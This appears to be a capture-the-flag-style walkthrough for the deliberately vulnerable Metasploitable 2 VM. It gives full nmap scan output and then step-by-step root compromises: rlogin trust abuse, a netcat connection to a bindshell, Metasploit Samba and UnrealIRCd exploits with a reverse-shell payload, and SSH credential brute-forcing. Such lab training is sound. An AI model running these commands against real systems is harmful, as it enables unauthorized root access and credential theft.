The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.
Getting Started
After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.
Running Services:
From our attack machine, we run a scan to identify open ports and running services on the vulnerable machine.
nmap -p- <machine_ip>and we got the following result
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
34423/tcp open unknown
34841/tcp open unknown
44265/tcp open unknown
51815/tcp open unknownNow, time to run an aggressive scan on those ports to identify versions of those running services and check for common vulnerabilities
nmap -A -p 21,22,23,25,53,80,111,139,445,512,513,514,1099,1524,2049,2121,3306,3632,5432,5900,6000,6667,6697,8009,8180,8787,34423,34841,44265,51815 <machine_ip>and we got the following result
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.101
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2025-01-04T11:31:42+00:00; +2s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp open rpcbind 2 (RPC #100000)
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 11
| Capabilities flags: 43564
| Some Capabilities: Support41Auth, LongColumnFlag, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: Hw@vS|67RtscxStmIc6%
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2025-01-04T11:31:41+00:00; +1s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34423/tcp open nlockmgr 1-4 (RPC #100021)
34841/tcp open java-rmi GNU Classpath grmiregistry
44265/tcp open status 1 (RPC #100024)
51815/tcp open mountd 1-3 (RPC #100005)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2025-01-04T06:31:34-05:00
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)Time For EXPLOITATION!
1. Unix Basics:
Known as “r” services, TCP ports 512, 513, and 514 are incorrectly set to provide remote access from any host (a typical “.rhosts + +” scenario). To benefit from this, execute the following command as your local root user and confirm that the “rsh-client” client is installed (on Ubuntu). If you are asked for an SSH key, Ubuntu is utilizing SSH by default since the rsh-client utilities are not installed.
Exploitation Commad:
rlogin -l root 192.168.56.4or
rlogin -l msfadmin 192.168.56.4
using first command, we got shell as root.
2. Using bindshell on Port 1524:
1524/tcp open bindshell Metasploitable root shellExploitation Commad:
nc <machine_ip> 1524using this command, we’ll get a root shell
3. Using Samba on Port 139:
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Msfconsole Exploitation commands:
search sambda
use exploit/multi/samba/usermap_script
set RHOSTS <machine_ip>
runNow we get root shell
Make the shell session more stable:
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm4. Using IRC Port 6667:
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCdMsfconsole Exploitation commands:
search UnrealIRCd
use 0
set payload 6
set RHOSTS <machine_ip>
set LHOST <your_machine_ip>
runwe got root shell
Make the shell session more stable
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm5. Brute Forcing SSH Credentials:
Msfconsole Commands:
use auxiliary/scanner/ssh/ssh_login
set rhosts <machine_ip>
set user_file <username_file>
set pass_file <password_file>
exploit
we got a hit msfadmin:msfadmin
Now we can connect to ssh using these credentials and using the following command:
ssh -o HostkeyAlgorithms=+ssh-rsa msfadmin@<machine_ip>
If you visit the URL http://<machine_ip>:80
you get a list of vulnerable web applications, where you can practice web app vulnerabilities.
Happy Hacking!
Hack The Planet!
